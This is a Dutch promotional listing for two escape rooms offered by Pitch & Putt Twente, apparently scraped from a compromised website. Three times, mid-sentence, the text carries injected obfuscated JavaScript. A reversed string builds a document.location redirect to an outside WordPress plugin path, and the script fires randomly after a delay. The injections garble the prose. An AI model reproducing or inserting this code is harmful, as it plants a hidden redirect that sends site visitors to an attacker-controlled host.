Escaperoom voor 4-8 personen t.w.v. €100 aangeboden door Pitch Putt Twente

Aangeboden door Pitch&Putt Twente een unieke escaperoombeleving! U mag zelf de keuze maken uit de twee verschillende escapes rooms:

Freules van Beckum:

4-8 personen

In 1544 werden de Freules van Beckum, wonend op Kasteel Nijenhuis te Diepenheim,  veroordeeld voor ketterij en ter dood gebracht op de brandstapel in Delden.
Een intrige die z’n sporen heeft achtergelaten. Een misstap van de adel? Of toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch  een complot…………..

Brommerskiek’n.

3-8 personen

Op erve Bekkedam Brommerskiek’n verklapt al veel van de sfeer van de kamer.

Een thema dat doet denken aan crossbrommers op het maisland maar ook aan uitgaan en stappen, met een knipoog naar de meisjes:  goa’j met brommerskiek’n? Lukt het jouw team om binnen de tijd te ontsnappen? Of willen ze er juist niet uit?

2 nieuwe identieke kamers. Hier kun je als groepen tegelijk, naast elkaar, gaan battelen om de snelste tijd. Het is zelfs mogelijk om elkaars voortgang te zien en elkaar te gaan “beïnvloeden”! Je kunt in 2 groepen spelen van 3 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 8 personen per kamer. De kamer is ook samen met 1 groep te spelen van 3 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 8 personen.

Voor meer informatie kijkt u op de site